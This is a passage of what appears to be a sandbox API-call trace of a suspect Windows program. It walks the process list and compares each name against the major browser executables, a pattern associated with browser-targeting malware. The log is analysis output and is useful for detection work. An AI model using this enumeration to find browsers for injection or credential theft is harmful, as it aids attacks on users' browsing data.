th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0168.015] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0168.015] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0168.015] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0168.015] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0168.015] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.015] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.016] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0168.016] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0168.016] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0168.016] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0168.016] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.016] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.016] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0168.017] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0168.017] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0168.017] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0168.017] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.017] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.017] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0168.017] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0168.017] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0168.017] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0168.017] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.017] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.018] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0168.018] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0168.018] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0168.018] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0168.018] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.018] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.018] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0168.018] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0168.018] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0168.018] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0168.018] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.019] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0168.019] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0168.019] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0168.019] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0168.019] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0168.019] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.019] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.020] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0168.020] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0168.020] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0168.020] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0168.020] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.020] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.020] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0168.020] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0168.020] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0168.021] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0168.021] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.021] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0168.021] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0168.021] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0168.021] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0168.021] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0168.021] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.021] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0168.022] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0168.022] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0168.022] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0168.022] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0168.022] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.022] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0168.022] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0168.022] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0168.022] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0168.022] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0168.022] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.022] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.023] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0168.023] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0168.023] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0168.023] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0168.023] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.023] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0168.024] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0168.024] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0168.024] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0168.024] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0168.024] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.024] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0168.024] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0168.024] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0168.024] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0168.024] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0168.024] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.024] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0168.025] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0168.025] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0168.025] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0168.025] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0168.025] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.025] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0168.025] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0168.025] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0168.025] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0168.025] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0168.026] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.026] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0168.026] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0168.026] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0168.026] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0168.026] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0168.026] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.026] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0168.027] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0168.027] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0168.027] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0168.027] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0168.027] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.027] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0168.027] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0168.027] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0168.027] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0168.027] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0168.027] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.027] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0168.028] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0168.028] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0168.028] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0168.028] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0168.028] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.028] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0168.028] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0168.028] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0168.029] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0168.029] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0168.029] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.029] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0168.029] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0168.029] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0168.029] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0168.029] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0168.029] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.029] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0168.030] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0168.030] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0168.030] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0168.030] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0168.030] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.030] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0168.030] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0168.030] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0168.030] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0168.030] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0168.030] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.030] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0168.031] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0168.031] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0168.031] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0168.031] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0168.031] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.031] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0168.032] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0168.032] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0168.032] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0168.032] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0168.032] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.032] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0168.032] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0168.032] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0168.032] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0168.032] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0168.032] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.032] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0168.033] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0168.033] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0168.033] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0168.033] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0168.033] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.033] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0168.033] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0168.033] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0168.033] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0168.033] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0168.033] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.034] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0168.034] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0168.034] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0168.034] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0168.034] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0168.034] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.034] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0168.035] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0168.035] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0168.035] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0168.035] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0168.035] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.035] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0168.035] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0168.035] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0168.035] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0168.035] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0168.035] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.035] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0168.036] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0168.036] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0168.036] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0168.036] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0168.036] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.036] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0168.037] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0168.037] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0168.037] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0168.037] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0168.037] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.037] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0168.038] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0168.038] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0168.038] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0168.038] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0168.038] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.038] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.038] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0168.038] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0168.038] 